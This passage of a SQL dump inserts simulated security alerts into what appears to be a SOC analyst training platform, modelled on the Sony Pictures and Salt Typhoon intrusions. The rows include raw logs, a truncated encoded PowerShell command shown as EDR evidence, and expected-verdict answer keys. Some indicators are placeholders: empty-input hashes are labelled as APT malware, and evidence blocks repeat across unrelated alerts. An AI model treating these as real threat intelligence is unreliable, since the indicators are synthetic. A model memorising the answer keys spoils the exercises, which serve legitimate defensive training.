control.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b6a9b3f8a8e4b5c8f9c2d7e58f8a3b6c\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash-reputation-database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known backdoor tools used by the Lazarus Group.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal-user-database\",\"verdict\":\"suspicious\",\"details\":\"User account 
activity inconsistent with usual behavior.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1464, 'Lateral Movement: Expanding Reach within the Network', 'high', 'Network flow logs', 'The attackers used stolen credentials and network vulnerabilities to move laterally within Sony\'s infrastructure, searching for sensitive information and furthering their infiltration.', 'Network Propagation', 'T1563.002', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-15T14:32:17Z\",\"event_type\":\"network_traffic\",\"source_ip\":\"10.0.45.23\",\"destination_ip\":\"192.168.1.105\",\"external_attacker_ip\":\"203.0.113.45\",\"protocol\":\"SMB\",\"action\":\"login_attempt\",\"username\":\"j.doe\",\"status\":\"success\",\"hash\":\"f5d5a6b9c3b53e4d2a3e1b6f8d7e9c2b\",\"filename\":\"malware_payload.dll\",\"indicators\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\"},{\"type\":\"ip\",\"value\":\"192.168.1.105\"},{\"type\":\"ip\",\"value\":\"10.0.45.23\"},{\"type\":\"hash\",\"value\":\"f5d5a6b9c3b53e4d2a3e1b6f8d7e9c2b\"},{\"type\":\"filename\",\"value\":\"malware_payload.dll\"},{\"type\":\"username\",\"value\":\"j.doe\"}]}', '2026-03-07 00:51:05', '2026-03-11 03:43:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel Database\",\"verdict\":\"malicious\",\"details\":\"Known Lazarus Group infrastructure IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.45.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Employee workstation\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f5d5a6b9c3b53e4d2a3e1b6f8d7e9c2b\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Recognized Lazarus 
malware\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malware_payload.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected as malicious payload\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Unusual activity detected\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1465, 'Exfiltration: Data Theft and Leakage', 'critical', 'Data transfer logs', 'Concluding their operation, the attackers exfiltrated a vast amount of confidential data, later leaking it publicly to cause reputational damage and disrupt Sony Pictures\' business operations.', 'Data Exfiltration', 'T1041', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-15T03:30:12Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"45.76.23.17\",\"user\":\"jdoe\",\"files_exfiltrated\":[\"confidential_report_2023.pdf\",\"financial_summary.xlsx\"],\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"protocol\":\"HTTPS\",\"destination_port\":443,\"malware_associated\":\"Sony Pictures\",\"comment\":\"Data exfiltrated to external IP, associated with known APT operations.\"}', '2026-03-07 00:51:05', '2026-03-11 03:44:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal host IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"45.76.23.17\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Lazarus Group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with tools used in prior APT operations.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_report_2023.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_documentation\",\"verdict\":\"sensitive\",\"details\":\"Sensitive company 
document.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"company_directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account used for exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-07T14:15:20.856Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:30:12Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"45.76.23.17\\\",\\\"user\\\":\\\"jdoe\\\",\\\"files_exfiltrated\\\":[\\\"confidential_report_2023.pdf\\\",\\\"financial_summary.xlsx\\\"],\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443,\\\"malware_associated\\\":\\\"Sony Pictures\\\",\\\"comment\\\":\\\"Data exfiltrated to external IP, associated with known APT operations.\\\"}\"},{\"timestamp\":\"2026-03-07T14:14:20.856Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:30:12Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"45.76.23.17\\\",\\\"user\\\":\\\"jdoe\\\",\\\"files_exfiltrated\\\":[\\\"confidential_report_2023.pdf\\\",\\\"financial_summary.xlsx\\\"],\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443,\\\"malware_associated\\\":\\\"Sony Pictures\\\",\\\"comment\\\":\\\"Data exfiltrated to external IP, associated with known APT operations.\\\"}\"},{\"timestamp\":\"2026-03-07T14:13:20.856Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:30:12Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"45.76.23.17\\\",\\\"user\\\":\\\"jdoe\\\",\\\"files_exfiltrated\\\":[\\\"confidential_report_2023.pdf\\\",\\\"financial_summary.xlsx\\\"],\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443,\\\"malware_associated\\\":\\\"Sony Pictures\\\",\\\"comment\\\":\\\"Data exfiltrated to external IP, associated with known APT operations.\\\"}\"},{\"timestamp\":\"2026-03-07T14:12:20.856Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:30:12Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"45.76.23.17\\\",\\\"user\\\":\\\"jdoe\\\",\\\"files_exfiltrated\\\":[\\\"confidential_report_2023.pdf\\\",\\\"financial_summary.xlsx\\\"],\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443,\\\"malware_associated\\\":\\\"Sony Pictures\\\",\\\"comment\\\":\\\"Data exfiltrated to external IP, associated with known APT operations.\\\"}\"},{\"timestamp\":\"2026-03-07T14:11:20.856Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:30:12Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"45.76.23.17\\\",\\\"user\\\":\\\"jdoe\\\",\\\"files_exfiltrated\\\":[\\\"confidential_report_2023.pdf\\\",\\\"financial_summary.xlsx\\\"],\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443,\\\"malware_associated\\\":\\\"Sony Pictures\\\",\\\"comment\\\":\\\"Data exfiltrated to external IP, associated with known APT operations.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1466, 'Initial Access via Spear Phishing', 'high', 'Federal Email Server Logs', 'A spear phishing email was sent to a federal employee, attempting to compromise user credentials. The email contained a malicious attachment disguised as a PDF document.', 'Phishing', 'T1566.001', 1, 'Closed', 296, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.105\",\"email_subject\":\"Urgent Update Required\",\"sender_email\":\"john.doe@federalagency.com\",\"recipient_email\":\"alice.smith@federalagency.com\",\"attachment\":\"Update_Required.pdf\",\"attachment_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"malicious_domain\":\"update-portal.example.com\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\"}', '2026-03-10 17:44:09', '2026-03-14 21:33:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal user IP\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Associated with phishing campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"update-portal.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Phishing domain\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Spear Phishing\",\"date\":\"2026-03-11T02:38:07.558Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1467, 'Execution of Malicious Payload', 'high', 'Endpoint Detection Systems', 'Upon successful credential compromise, Salt Typhoon deploys a malicious payload to execute within federal systems, establishing a foothold. The payload was executed on a compromised endpoint.', 'Malware Deployment', 'T1059: Command and Scripting Interpreter', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"EDR-56789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"destination_username\":\"jdoe\",\"file_name\":\"payload.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"process_command_line\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c payload.exe\",\"detection_method\":\"Behavioral Analysis\",\"severity\":\"High\",\"status\":\"Malicious\"}', '2026-03-10 17:44:09', '2026-03-11 02:38:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Corporate endpoint device.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Identified as part of Salt Typhoon malware toolkit.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Recent account compromise 
detected.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1468, 'Persistence through Backdoor Installation', 'high', 'Network Traffic Analysis', 'The attackers have installed a sophisticated backdoor to ensure sustained access to the compromised network. This backdoor allows them to maintain presence even if initial malware is detected and removed.', 'Persistence Mechanism', 'T1105 - Ingress Tool Transfer', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-03T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.5\",\"protocol\":\"TCP\",\"destination_port\":4444,\"filename\":\"backdoor_installer.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\",\"event_type\":\"file_download\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"action\":\"download\",\"status\":\"successful\"}', '2026-03-10 17:44:09', '2026-03-11 02:38:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Corporate workstation\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"backdoor_installer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Anti-malware Database\",\"verdict\":\"malicious\",\"details\":\"Backdoor installation executable\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 
'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1469, 'Lateral Movement to Wiretap Systems', 'high', 'Internal Network Monitoring', 'Using stolen credentials, an attacker has moved laterally within the network, attempting to access federal wiretap systems. The attack was detected at step 4, where unauthorized login attempts were observed from an internal host to a sensitive wiretap server.', 'Credential Access', 'T1078: Valid Accounts', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-15T14:25:37Z\",\"event_id\":\"4624\",\"hostname\":\"internal-host-3\",\"source_ip\":\"10.0.5.12\",\"destination_ip\":\"192.168.1.50\",\"destination_hostname\":\"wiretap-server-01\",\"username\":\"jdoe\",\"domain\":\"CORP\",\"logon_type\":\"3\",\"authentication_package\":\"Kerberos\",\"logon_process\":\"User32\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"status\":\"Success\"}', '2026-03-10 17:44:09', '2026-03-11 02:38:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.5.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the host used for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP address of the target wiretap server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Username used for unauthorized access attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash of the process used during login.\"}}],\"recommended_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1470, 'Exfiltration of Sensitive Communications', 'high', 'Data Loss Prevention Tools', 'Salt Typhoon has initiated the exfiltration of sensitive wiretap communications using a known malicious external IP address. This activity is consistent with their objective to deliver intelligence to their sponsors.', 'Data Exfiltration', 'T1041', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-05T14:23:34Z\",\"event_id\":\"data_exfiltration_001\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"username\":\"jdoe\",\"exfil_filename\":\"wiretap_data.zip\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"event_description\":\"Data exfiltration detected from internal network to external IP.\",\"action_taken\":\"Alert triggered\"}', '2026-03-10 17:44:09', '2026-03-11 02:38:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the suspected host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"wiretap_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file containing wiretap communications.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Hash Database\",\"verdict\":\"malicious\",\"details\":\"File hash associated with exfiltrated sensitive data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"User 
Account Database\",\"verdict\":\"internal\",\"details\":\"Username of the account used for data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-11T02:38:07.706Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"event_id\\\":\\\"data_exfiltration_001\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfil_filename\\\":\\\"wiretap_data.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"event_description\\\":\\\"Data exfiltration detected from internal network to external IP.\\\",\\\"action_taken\\\":\\\"Alert triggered\\\"}\"},{\"timestamp\":\"2026-03-11T02:37:07.706Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"event_id\\\":\\\"data_exfiltration_001\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfil_filename\\\":\\\"wiretap_data.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"event_description\\\":\\\"Data exfiltration detected from internal network to external IP.\\\",\\\"action_taken\\\":\\\"Alert 
triggered\\\"}\"},{\"timestamp\":\"2026-03-11T02:36:07.706Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"event_id\\\":\\\"data_exfiltration_001\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfil_filename\\\":\\\"wiretap_data.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"event_description\\\":\\\"Data exfiltration detected from internal network to external IP.\\\",\\\"action_taken\\\":\\\"Alert triggered\\\"}\"},{\"timestamp\":\"2026-03-11T02:35:07.706Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"event_id\\\":\\\"data_exfiltration_001\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfil_filename\\\":\\\"wiretap_data.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"event_description\\\":\\\"Data exfiltration detected from internal network to external IP.\\\",\\\"action_taken\\\":\\\"Alert triggered\\\"}\"},{\"timestamp\":\"2026-03-11T02:34:07.706Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
